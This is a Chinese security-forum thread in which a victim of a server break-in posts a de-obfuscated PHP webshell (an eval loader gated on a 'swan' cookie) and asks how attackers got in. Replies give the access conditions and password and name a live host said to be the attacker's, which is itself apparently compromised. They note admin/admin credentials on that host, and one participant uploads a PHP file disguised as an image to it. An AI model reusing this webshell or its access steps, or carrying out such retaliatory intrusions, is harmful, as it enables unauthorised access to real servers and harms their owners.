[求助]服务器被入侵有日志这些能找出漏洞吗-付费问答-看雪-安全社区|安全招聘|kanxue.com

[已解决] [求助]服务器被入侵有日志这些能找出漏洞吗 50.00雪花

2020-8-23 16:06 3667

[已解决] [求助]服务器被入侵有日志这些能找出漏洞吗 50.00雪花

wx_三五瓶

2020-8-23 16:06

3667

https://wwa.lanzous.com/ic2Xsfyqwuh 日志文件和木马都在里面

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・1

免费・0

打赏

最新回复 (51) 1 2 3 ▶
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 16:47 2 楼 0 <?php /* 本程序由 Ranyun_JieMi_EnphpV1 3.0算法解密 / ?><?php / -- mzphp 混淆加密：https://git.oschina.net/mz/mzphp2 */ error_reporting(E_ALL ^ E_NOTICE); error_reporting(E_ERROR \| E_PARSE); @set_time_limit(0); header('content-Type: text/html; charset=gb2312'); if (isset($_COOKIE['PHPSSESID']) == !1) { exit; } $c = 'ch' . 'r'; $b = $c(98) . $c(97) . $c(115) . $c(101) . $c(54) . $c(52) . $c(95) . 'd' . $c(101) . $c(99) . $c(111) . $c(100) . $c(101); $r = $b('cHJlZ19yZXBsYWNl'); $f = $b('Y3JlYXRlX2Z1bmN0aW9u'); if ($_COOKIE['PHPSSESID'] == $b('c3dhbg==')) { $html = $b('JHBhc3N3b3JkPSdzd2FuJzs=') . '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("jVRpb9pAEP0eKf9hY6HYlmi4EqQWWUrUOhSlmOCDFKrKWuwBr7J4Xe9Sjor/3jWQYA617Bdr53jz5u2MIU1Z6qeQsFSQeKyV9cblRQQ4hFRTAhYLiMUHd5HAJyRgLkqRmNAGCiKcchDGeFitVapKlsOBc8JinwucCi2zkBHSrgiXcVrBd0zHaXWsH0oSJRyY8lPX0Z/LCyRPIUAGUtXG9jblkOKxLJtZ22xJKMWl25sy0gI2SbAgQwoN1HZaJqrflBvohcQhm3FkuejupqrvcFIqEYaYQ/3WDyFgIWj7N6XvRU67aZnD2qDdrnaXg6+vFfxi93Et7PTMctltVjqhN69738NOd9mb9nvh4LlrGIqu56pYMDOQUkpeP/56erJILVkMyKSkbCPWKnCRJoxrhaD4lqGj62s0msaByESDOeGCa2ognT6JiVD/4Yc5BOpOvo2Ekez1PVt7o5edtVU+AkvkOwRREX327G+dZ9eXnw2ds6LdVtvseG4RVe7OirdN17Mt136wnEfTLiLX9szzaDmm/dA0LbeYm4V85npe3pXIko9wA8o45D2r/z+GFM4fy1lVMaVs5mcwI5ZAfCi1gEnCJYP7EaGyxoF+6woyQiy0TaSu75zv7O/JJKHZCKpqcYt4BJKjqYRAv5D0IQ4fZU3lNGRGJ2vA324t3+OWE+BU/1eGgUaYctjv9XhtZaXxksQjisXhOhUCPVdttfkBnLH/8BvTkxESbPUX' . $b('IikpKTs7'); $e = @$f('', $r('/#html/', '', $html)); $e(); } else { $html = '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("c0gtS8zRSK/KzEvLSSxJ1UhKLE41M4lPSU3OT0nVUIl39vf39nSNVg/wCAgOdg32dFGP1dTUtAYA' . $b('IikpKTs7'); $e = @$f('', $r('/#html/', '', $html)); $e(); } exit; 这是我解密的php大马，但是这个大马要怎么访问啊，我传服务器不能访问
0x99er 雪币： 3072 活跃值： (20) 能力值： ( LV1，RANK：40 ) 在线值：发帖 2 回帖 54 粉丝 0 关注私信	0x99er 2020-8-23 17:59 3 楼 0 wx_三五瓶 <?php /* 本程序由 Ranyun_JieMi_EnphpV1 3.0算法解密 */ ?> ... 后缀改.php，找个测试服务器看看。
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 18:22 4 楼 0 6otest 后缀改.php，找个测试服务器看看。我改了的不能访问
wmsuper 雪币： 10732 活跃值： (14485) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 322 关注私信	wmsuper 7 2020-8-23 19:13 5 楼 0 黑客的服务器：http://www.buy0538.cn/ webshell访问密码：swan
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 19:58 6 楼 0 wmsuper 黑客的服务器：http://www.buy0538.cn/ webshell访问密码：swan 他webshell的密码存在http://www.buy0538.cn/web/
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:03 7 楼 0 服务器里安装了收钱吧是弱密码，密码和账号都是admin
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:12 8 楼 0 wmsuper 黑客的服务器：http://www.buy0538.cn/ webshell访问密码：swan 这个服务器疑似也是被黑客入侵的
wmsuper 雪币： 10732 活跃值： (14485) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 322 关注私信	wmsuper 7 2020-8-23 20:14 9 楼 0 大佬来个直播日黑客服务器呗
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:19 10 楼 0 wmsuper 黑客的服务器：http://www.buy0538.cn/ webshell访问密码：swan 老哥他的webshell怎么访问？
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:19 11 楼 0 EX呵呵服务器里安装了收钱吧是弱密码，密码和账号都是admin 老哥能查出我服务器他怎么入侵的吗
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:23 12 楼 0 wx_三五瓶老哥能查出我服务器他怎么入侵的吗 bzd呀那个收钱吧里的上传点不知道为什么传不上去文件
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:24 13 楼 0 EX呵呵 bzd呀那个收钱吧里的上传点不知道为什么传不上去文件 bzd什么意思？我这种源码他好像都能入侵，你知道漏洞在哪吗，我日志都上传了
wmsuper 雪币： 10732 活跃值： (14485) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 322 关注私信	wmsuper 7 2020-8-23 20:25 14 楼 0 wx_三五瓶老哥他的webshell怎么访问？条件一： if ($_COOKIE['PHPSSESID'] ==‘swan’) 条件二： $password='swan'; define('envlpass',$password); $_COOKIE['envlpass'] == md5(envlpass)
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:25 15 楼 0 他这个是大马吧
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:27 16 楼 0 wx_三五瓶老哥能查出我服务器他怎么入侵的吗应该是把php马伪装成图片上传
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:27 17 楼 0 但是他怎么解析的啊，我把服务器里面的马删了，给打包在云盘链接在上面日志也在
wmsuper 雪币： 10732 活跃值： (14485) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 322 关注私信	wmsuper 7 2020-8-23 20:28 18 楼 0 wx_三五瓶他这个是大马吧小马下载大马，小马下载大马的触发条件是条件一，大马进去的条件是二
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:28 19 楼 0 我觉得可以试试用他的木马对付他自己
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:29 20 楼 0 wmsuper 小马下载大马，小马下载大马的触发条件是条件一，大马进去的条件是二老哥能从我的日志看出来我的漏洞在哪吗？
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:30 21 楼 0 EX呵呵我觉得可以试试用他的木马对付他自己对付他都没意思，我想知道我漏洞在哪
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:33 22 楼 0 wmsuper 条件一： if ($_COOKIE['PHPSSESID'] ==‘swan’) 条件二： $password='swan'; define('envlpass',$password) ... 图片（php）上传成功了 http://www.buy0538.cn/pay/uploads/20200823202925.jpg
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:34 23 楼 0 EX呵呵图片（php）上传成功了 http://www.buy0538.cn/pay/uploads/20200823202925.jpg 老哥传成功了，是图片你怎么运行喃
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:34 24 楼 0 wx_三五瓶对付他都没意思，我想知道我漏洞在哪图片上传（把php伪装成图片上传）
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:36 25 楼 0 EX呵呵图片上传（把php伪装成图片上传）他上传都是直接上传的图片马，但是他怎么运行的
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

wx_三五瓶

发帖

回帖

RANK

关注

私信

他的文章

[求助]这是木马么？

[求助]宝塔waf拦截问题

关于网站上传点不能上传php的问题

关于php上传漏洞无权限

[求助]服务器被入侵有日志这些能找出漏洞吗

关于我们

联系我们

企业服务

看雪公众号

最新回复 (51) 1 2 3 ▶
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 16:47 2 楼 0 <?php /* 本程序由 Ranyun_JieMi_EnphpV1 3.0算法解密 / ?><?php / -- mzphp 混淆加密：https://git.oschina.net/mz/mzphp2 */ error_reporting(E_ALL ^ E_NOTICE); error_reporting(E_ERROR \| E_PARSE); @set_time_limit(0); header('content-Type: text/html; charset=gb2312'); if (isset($_COOKIE['PHPSSESID']) == !1) { exit; } $c = 'ch' . 'r'; $b = $c(98) . $c(97) . $c(115) . $c(101) . $c(54) . $c(52) . $c(95) . 'd' . $c(101) . $c(99) . $c(111) . $c(100) . $c(101); $r = $b('cHJlZ19yZXBsYWNl'); $f = $b('Y3JlYXRlX2Z1bmN0aW9u'); if ($_COOKIE['PHPSSESID'] == $b('c3dhbg==')) { $html = $b('JHBhc3N3b3JkPSdzd2FuJzs=') . '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("jVRpb9pAEP0eKf9hY6HYlmi4EqQWWUrUOhSlmOCDFKrKWuwBr7J4Xe9Sjor/3jWQYA617Bdr53jz5u2MIU1Z6qeQsFSQeKyV9cblRQQ4hFRTAhYLiMUHd5HAJyRgLkqRmNAGCiKcchDGeFitVapKlsOBc8JinwucCi2zkBHSrgiXcVrBd0zHaXWsH0oSJRyY8lPX0Z/LCyRPIUAGUtXG9jblkOKxLJtZ22xJKMWl25sy0gI2SbAgQwoN1HZaJqrflBvohcQhm3FkuejupqrvcFIqEYaYQ/3WDyFgIWj7N6XvRU67aZnD2qDdrnaXg6+vFfxi93Et7PTMctltVjqhN69738NOd9mb9nvh4LlrGIqu56pYMDOQUkpeP/56erJILVkMyKSkbCPWKnCRJoxrhaD4lqGj62s0msaByESDOeGCa2ognT6JiVD/4Yc5BOpOvo2Ekez1PVt7o5edtVU+AkvkOwRREX327G+dZ9eXnw2ds6LdVtvseG4RVe7OirdN17Mt136wnEfTLiLX9szzaDmm/dA0LbeYm4V85npe3pXIko9wA8o45D2r/z+GFM4fy1lVMaVs5mcwI5ZAfCi1gEnCJYP7EaGyxoF+6woyQiy0TaSu75zv7O/JJKHZCKpqcYt4BJKjqYRAv5D0IQ4fZU3lNGRGJ2vA324t3+OWE+BU/1eGgUaYctjv9XhtZaXxksQjisXhOhUCPVdttfkBnLH/8BvTkxESbPUX' . $b('IikpKTs7'); $e = @$f('', $r('/#html/', '', $html)); $e(); } else { $html = '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("c0gtS8zRSK/KzEvLSSxJ1UhKLE41M4lPSU3OT0nVUIl39vf39nSNVg/wCAgOdg32dFGP1dTUtAYA' . $b('IikpKTs7'); $e = @$f('', $r('/#html/', '', $html)); $e(); } exit; 这是我解密的php大马，但是这个大马要怎么访问啊，我传服务器不能访问
0x99er 雪币： 3072 活跃值： (20) 能力值： ( LV1，RANK：40 ) 在线值：发帖 2 回帖 54 粉丝 0 关注私信	0x99er 2020-8-23 17:59 3 楼 0 wx_三五瓶 <?php /* 本程序由 Ranyun_JieMi_EnphpV1 3.0算法解密 */ ?> ... 后缀改.php，找个测试服务器看看。
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 18:22 4 楼 0 6otest 后缀改.php，找个测试服务器看看。我改了的不能访问
wmsuper 雪币： 10732 活跃值： (14485) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 322 关注私信	wmsuper 7 2020-8-23 19:13 5 楼 0 黑客的服务器：http://www.buy0538.cn/ webshell访问密码：swan
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 19:58 6 楼 0 wmsuper 黑客的服务器：http://www.buy0538.cn/ webshell访问密码：swan 他webshell的密码存在http://www.buy0538.cn/web/
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:03 7 楼 0 服务器里安装了收钱吧是弱密码，密码和账号都是admin
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:12 8 楼 0 wmsuper 黑客的服务器：http://www.buy0538.cn/ webshell访问密码：swan 这个服务器疑似也是被黑客入侵的
wmsuper 雪币： 10732 活跃值： (14485) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 322 关注私信	wmsuper 7 2020-8-23 20:14 9 楼 0 大佬来个直播日黑客服务器呗
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:19 10 楼 0 wmsuper 黑客的服务器：http://www.buy0538.cn/ webshell访问密码：swan 老哥他的webshell怎么访问？
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:19 11 楼 0 EX呵呵服务器里安装了收钱吧是弱密码，密码和账号都是admin 老哥能查出我服务器他怎么入侵的吗
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:23 12 楼 0 wx_三五瓶老哥能查出我服务器他怎么入侵的吗 bzd呀那个收钱吧里的上传点不知道为什么传不上去文件
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:24 13 楼 0 EX呵呵 bzd呀那个收钱吧里的上传点不知道为什么传不上去文件 bzd什么意思？我这种源码他好像都能入侵，你知道漏洞在哪吗，我日志都上传了
wmsuper 雪币： 10732 活跃值： (14485) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 322 关注私信	wmsuper 7 2020-8-23 20:25 14 楼 0 wx_三五瓶老哥他的webshell怎么访问？条件一： if ($_COOKIE['PHPSSESID'] ==‘swan’) 条件二： $password='swan'; define('envlpass',$password); $_COOKIE['envlpass'] == md5(envlpass)
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:25 15 楼 0 他这个是大马吧
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:27 16 楼 0 wx_三五瓶老哥能查出我服务器他怎么入侵的吗应该是把php马伪装成图片上传
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:27 17 楼 0 但是他怎么解析的啊，我把服务器里面的马删了，给打包在云盘链接在上面日志也在
wmsuper 雪币： 10732 活跃值： (14485) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 136 粉丝 322 关注私信	wmsuper 7 2020-8-23 20:28 18 楼 0 wx_三五瓶他这个是大马吧小马下载大马，小马下载大马的触发条件是条件一，大马进去的条件是二
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:28 19 楼 0 我觉得可以试试用他的木马对付他自己
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:29 20 楼 0 wmsuper 小马下载大马，小马下载大马的触发条件是条件一，大马进去的条件是二老哥能从我的日志看出来我的漏洞在哪吗？
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:30 21 楼 0 EX呵呵我觉得可以试试用他的木马对付他自己对付他都没意思，我想知道我漏洞在哪
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:33 22 楼 0 wmsuper 条件一： if ($_COOKIE['PHPSSESID'] ==‘swan’) 条件二： $password='swan'; define('envlpass',$password) ... 图片（php）上传成功了 http://www.buy0538.cn/pay/uploads/20200823202925.jpg
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:34 23 楼 0 EX呵呵图片（php）上传成功了 http://www.buy0538.cn/pay/uploads/20200823202925.jpg 老哥传成功了，是图片你怎么运行喃
EX呵呵雪币： 247 活跃值： (3520) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 200 粉丝 4 关注私信	EX呵呵 2020-8-23 20:34 24 楼 0 wx_三五瓶对付他都没意思，我想知道我漏洞在哪图片上传（把php伪装成图片上传）
wx_三五瓶雪币： 10 活跃值： (557) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 61 粉丝 1 关注私信	wx_三五瓶 2020-8-23 20:36 25 楼 0 EX呵呵图片上传（把php伪装成图片上传）他上传都是直接上传的图片马，但是他怎么运行的
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复